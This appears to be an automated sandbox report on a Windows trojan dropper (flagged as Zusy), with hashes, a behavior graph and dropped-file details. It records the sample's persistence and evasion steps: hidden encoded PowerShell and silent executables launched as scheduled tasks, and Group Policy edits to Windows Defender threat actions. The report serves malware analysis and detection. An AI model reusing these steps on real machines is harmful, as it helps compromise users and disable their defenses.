Command and Scripting Interpreter		Boot or Logon Initialization Scripts11
Scheduled Task/Job		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Archive Collected Data		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts11
Scheduled Task/Job		Logon Script (Windows)Logon Script (Windows)1
Modify Registry		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Native API		Logon Script (Mac)Logon Script (Mac)41
Virtualization/Sandbox Evasion		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud Accounts2
PowerShell		Network Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets4
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common11
Deobfuscate/Decode Files or Information		Cached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Obfuscated Files or Information		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
File Deletion		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 753408 Sample: file.exe Startdate: 24/11/2022 Architecture: WINDOWS Score: 88 89 Antivirus detection for dropped file 2->89 91 Multi AV Scanner detection for dropped file 2->91 93 Sigma detected: Schedule system process 2->93 95 2 other signatures 2->95 10 file.exe 7 2->10         started        13 pJKKXsE.exe 8 2->13         started        16 powershell.exe 10 2->16         started        18 gpscript.exe 2->18         started        process3 file4 81 C:\Users\user\AppData\Local\...\Install.exe, PE32 10->81 dropped 20 Install.exe 4 10->20         started        83 C:\Windows\Temp\...behaviorgraphaSURYx.exe, PE32 13->83 dropped 101 Antivirus detection for dropped file 13->101 103 Multi AV Scanner detection for dropped file 13->103 105 Very long command line found 13->105 23 powershell.exe 9 13->23         started        26 gpupdate.exe 1 16->26         started        28 conhost.exe 16->28         started        signatures5 process6 file7 79 C:\Users\user\AppData\Local\...\Install.exe, PE32 20->79 dropped 30 Install.exe 10 20->30         started        99 Uses cmd line tools excessively to alter registry or file data 23->99 34 cmd.exe 23->34         started        36 conhost.exe 23->36         started        38 reg.exe 23->38         started        42 12 other processes 23->42 40 conhost.exe 26->40         started        signatures8 process9 file10 85 C:\Users\user\AppData\Local\...\pJKKXsE.exe, PE32 30->85 dropped 87 C:\Windows\System32behaviorgraphroupPolicy\gpt.ini, ASCII 30->87 dropped 107 Antivirus detection for dropped file 30->107 109 Multi AV Scanner detection for dropped file 30->109 111 Uses schtasks.exe or at.exe to add and modify task schedules 30->111 113 Modifies Group Policy settings 30->113 44 forfiles.exe 1 30->44         started        46 forfiles.exe 1 30->46         started        48 schtasks.exe 2 30->48         started        52 3 other processes 30->52 115 Uses cmd line tools excessively to alter registry or file data 34->115 50 reg.exe 34->50         started        signatures11 process12 process13 54 cmd.exe 1 44->54         started        57 conhost.exe 44->57         started        59 cmd.exe 1 46->59         started        61 conhost.exe 46->61         started        63 conhost.exe 48->63         started        65 conhost.exe 52->65         started        67 conhost.exe 52->67         started        69 conhost.exe 52->69         started        signatures14 97 Uses cmd line tools excessively to alter registry or file data 54->97 71 reg.exe 1 1 54->71         started        73 reg.exe 1 54->73         started        75 reg.exe 1 1 59->75         started        77 reg.exe 1 59->77         started        process15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe100%AviraHEUR/AGEN.1250601
C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe100%AviraHEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe100%AviraHEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe51%ReversingLabsWin32.Trojan.Zusy
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe51%ReversingLabsWin32.Trojan.Zusy
C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe51%ReversingLabsWin32.Trojan.Zusy

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
5.2.Install.exe.230000.0.unpack100%AviraHEUR/AGEN.1250601Download File
30.0.pJKKXsE.exe.1090000.0.unpack100%AviraHEUR/AGEN.1250601Download File
30.2.pJKKXsE.exe.1090000.0.unpack100%AviraHEUR/AGEN.1250601Download File
5.0.Install.exe.230000.0.unpack100%AviraHEUR/AGEN.1250601Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000018.00000002.352296909.00000173E56E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.432102762.00000000037B1000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://github.com/Pester/Pesterpowershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://contoso.com/powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            No contacted IP infos

            General Information

            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:753408
            Start date and time:2022-11-24 19:03:09 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 9s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:file.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:58
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal88.evad.winEXE@90/15@0/0
            EGA Information:
            • Successful, ratio: 40%
            HDC Information:
            • Successful, ratio: 100% (good quality ratio 97.8%)
            • Quality average: 84.8%
            • Quality standard deviation: 22.7%
            HCA Information:
            • Successful, ratio: 67%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): Conhost.exe, SgrmBroker.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, files.testupdate.info, clients2.google.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, api2.check-data.xyz, www.testupdate.info, www.googleapis.com, service-domain.xyz
            • Execution Graph export aborted for target powershell.exe, PID 6316 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            19:04:10Task SchedulerRun new task: gAhELFxgt path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
            19:04:10API Interceptor1x Sleep call for process: Install.exe modified
            19:04:16Task SchedulerRun new task: bbsSMGQQDZvgelOgpL path: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe s>DC /site_id 525403 /S
            19:04:21API Interceptor36x Sleep call for process: powershell.exe modified
            19:05:14API Interceptor1x Sleep call for process: pJKKXsE.exe modified
            19:05:18Task SchedulerRun new task: agQaaMVMfgqpSGSbr path: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe s>mY /site_id 525403 /S
            19:05:23Task SchedulerRun new task: AxVCmvJfwAUUq2 path: C:\Windows\system32\wscript.exe s>"C:\ProgramData\wizgoPrNSfGOJXVB\dsOzyCe.wsf"

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):1108
            Entropy (8bit):5.295294468448967
            Encrypted:false
            SSDEEP:24:3AkPpQrLAo4KAxX5qRPD42HZSCvKDe9tOBPnKEU:DPerB4nqRL/HZSCv4e9tOBfzU
            MD5:1C80F1303DD3DDBE3C096705FF52040A
            SHA1:3741403D56389B4EC7CF855E6C76C6DC2C95FF64
            SHA-256:42D4B9FA1F3F8EB161A0C58AADA51D2A417CC8B5CCDA334905C62ACC84493F88
            SHA-512:DC82F25447F671E173D1A7C4D00EAD4C3B1E040D913C7011F3D8A785625D1E26C5982DB8550A63947E996AAF104763C170E070C8BB176ED5EE17115D9DB3AB6C
            Malicious:false
            Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

            C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):6571809
            Entropy (8bit):7.996003603865134
            Encrypted:true
            SSDEEP:196608:91OAmLWOhmdNwFc7/hpQd4CYYlW7bWzg+aNxKpzDkp5x4WM:3OvWOkz3Qd4joeYSxKpzDo5x4WM
            MD5:65D01849A2062434BCE6C580CDA92A1D
            SHA1:8BEF36557E25532961724539E4DDBB4D11970627
            SHA-256:8B691E37EECDDAACD1BB83067CE261157895DEC8302E558C5C9D159C117151A4
            SHA-512:0EECF3824418C210DB4257EA5F2852BB32B02C5B3CE0FE62F841F71E10EC81482D889880EE42438B3EF2DC39682BDA2CD9435DD08CF21879D92148A9C7591EBE
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\7zS332F.tmp\__data__\config.txt

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):866146
            Entropy (8bit):7.999783652399914
            Encrypted:true
            SSDEEP:24576:4YGhUN5iugAVdfj07IcTW6rIwX2N8m/ZQq2fd7w+IxulInxM:4YGhPufVdfjgIUWmIwX2N8SKPd86UM
            MD5:927A00BC73AD358930C1BCA86D1F78AE
            SHA1:AAED44842119FF3287961E29E9A7CE38B5C92DC3
            SHA-256:526184BCF9AB17BEF2C67600F9D8E7E7CE4DDC4D4241BECC5F724E832AFB538D
            SHA-512:E952277890D0E02B56836BFCE7BC9427CF8616D06E4EBDE2F07EAE9899E7CD837BEADD93D6919627492B44EF91E7F2E08F37597840B2801AEA5313423CEF7932
            Malicious:false
            Preview:.E..{..X..D.+.i.h...v...4....F.KvYl.\.by......F.....<..@M3:s.....t...?.. ..y..9.S`j.Cc.{H..t.Uo....1C.K..o....2.)gJ/39...V.Y.Q.E...QN?.^.|.D"Kiw|...M....[..'].j..^.w...6.#../.[:L.M+n.M..)......M&.{E........T...\.qK.$.zQ..W..../.O.y...-....x......|....cp.~%.5...K.+0!..X.?#|..T7........e.l.i.@].XJ.f3D..a#..I......M.MD......:kl_T.<..h.O..........+.:-A.u.`..l......b....Ol....e...m...Ka.5..N.e..?.!....0Zs..Kl.<.....D`.\{.9.a..A..yJ..}b..Q2X.......zd..k(..E....q.$I.g...u..^X.*t..{{g....{.u..I...]/D.WA......q..\8k.}...G..2....zK.......T...C~!{.G.y...]j....#..fV..T9hm29....i...@Y...1r..M ..1j..b..3.%.d....=.G/.8%a...S..qz.T6S5G..X..iF".ar..g.~..n..|...N..dz..........r.>d*..3..pg^..q.2H.H.. .o....#xV..e.[>...PEUat[.a;.U...+.1(....[t.d.oy<.t.....a.m..&.%.n..........>..x.....4_V.2U.qU=c.N.L...cg.G.<..u=&321G.....k..3.O.riv.....T;K.. .?.V....Pw.[.....U..D`T.....kvc.....u .....j>&.....B.{.k.....\.2..u.-..P.:.Z...+F..>yI+b...C..X16...C.....#..pL...2.o...

            C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe

            Download File
            Process:C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):7104512
            Entropy (8bit):7.680459343919421
            Encrypted:false
            SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
            MD5:893793FBD70BA4A92919D09205D6C9C1
            SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
            SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
            SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 51%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe

            Download File
            Process:C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):7104512
            Entropy (8bit):7.680459343919421
            Encrypted:false
            SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
            MD5:893793FBD70BA4A92919D09205D6C9C1
            SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
            SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
            SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 51%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qj1olx5r.ljl.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wuyq3oxm.drj.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):12224
            Entropy (8bit):5.378646971222007
            Encrypted:false
            SSDEEP:192:ftH+8WSFv6anhZkECl+hurbf2s2DAsoPEBOoSVFEJ+aNK1eK9kN0rI:fteU767rb/095pSVW2rI
            MD5:0CFB8B33CC3E653098EAB5725BF1BC5A
            SHA1:5923E7777549575FFF8B5FB69A9C2C977A5A850B
            SHA-256:B85D5245BB5160EAAC695AC6A0E8879128AD053941517F2237DB19F17918FD77
            SHA-512:318AEC29CFA311B7024FAA96209EF1DD1A0471F04E9D698D0057B07F536A3D9387A3C240F1A6326769556BBDA3C6404C25AFF3C51312E2C82E7BB05F8B8A3B22
            Malicious:false
            Preview:@...e...........................................................H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration........................................T.@..>@..)@.Md@.]d@.Nd@...@.V.@.H.@.X.@..)@.[.@.NT@.HT@..S@..S@.hT@..S@..S@..S@.\.@..T@..)@..T@.@X@.?X@.

            C:\Windows\System32\GroupPolicy\Machine\Registry.pol

            Download File
            Process:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
            File Type:RAGE Package Format (RPF),
            Category:dropped
            Size (bytes):4488
            Entropy (8bit):3.5323112272256827
            Encrypted:false
            SSDEEP:96:W9H9h9j9n9a9K9o92939l9S9nyJ0R0yi0A0L0e0R060w8:5
            MD5:ED7FF4D7DB726C80E96C58C5F5E0711C
            SHA1:0F85681245C7A5F8BB772DF77CCF156350328CA7
            SHA-256:5F08875E4A6BE7333B7C56A7886EB4DB4785EF8423DE97D07008D047C16B360A
            SHA-512:9BE0F3194A02DE1BD5D375EB81663F515E409710CAEA6DE14E21ECF385477BE77FBD9DF43C0D609B24B593EC8894572F1F2044F5A74F07714A0645D7F5189616
            Malicious:false
            Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s...;.T.h.r.e.a.t.s._.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.2.5.4.5.1...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.5.6.5.9.6...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.4.2.8.7.2...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.1.4.7.7.4.9.3.7.3...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.

            C:\Windows\System32\GroupPolicy\gpt.ini

            Download File
            Process:C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):268
            Entropy (8bit):4.9507895998010145
            Encrypted:false
            SSDEEP:6:1QnMzYHxbnPonn3dXsMzYHxbnn/JIAuNhUHdhJg+5Rnn3dzC:1QM0HxbnIV0Hxbn/JnumuuzC
            MD5:A62CE44A33F1C05FC2D340EA0CA118A4
            SHA1:1F03EB4716015528F3DE7F7674532C1345B2717D
            SHA-256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
            SHA-512:9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
            Malicious:true
            Preview:[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.

            C:\Windows\Tasks\bbsSMGQQDZvgelOgpL.job

            Download File
            Process:C:\Windows\SysWOW64\schtasks.exe
            File Type:data
            Category:dropped
            Size (bytes):532
            Entropy (8bit):3.658255490968357
            Encrypted:false
            SSDEEP:12:poDBJSGQ1zKvkua3KMiTM5pgQ1zKvkuMzcFaV6:pG25vz+O15vfz8
            MD5:994758BDDB3C8D6ADF78A680641AD848
            SHA1:975BB5F5437BA677A27EC3A9ADA7AA03BD7DABDE
            SHA-256:7EA9020AF7B09CED7041E5B68A80C90ABD542AAAF1ED9B845F237B1CD4E6AC19
            SHA-512:C736FDC23FBE881D632EEDD9DC82044A181470A77107939F9D2DB8A1DB3466C202F0F85F09E9FF575DCCE84CB131B4D35CC192B221B0BA2BDAA3BA006235CF75
            Malicious:false
            Preview:....7+".J..D...o..-fF.......<... .....s...............................Q.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.X.A.f.c.x.y.Y.i.T.Q.K.M.O.E.R.w.\.e.f.p.l.S.H.r.L.k.K.v.i.a.S.K.\.p.J.K.K.X.s.E...e.x.e.....D.C. ./.s.i.t.e._.i.d. .5.2.5.4.0.3. ./.S...E.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.X.A.f.c.x.y.Y.i.T.Q.K.M.O.E.R.w.\.e.f.p.l.S.H.r.L.k.K.v.i.a.S.K.....D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.a.l.f.o.n.s...................0...............................................

            C:\Windows\Temp\__PSScriptPolicyTest_axhrt4ac.t0b.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Windows\Temp\__PSScriptPolicyTest_nwf0dec5.oqg.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

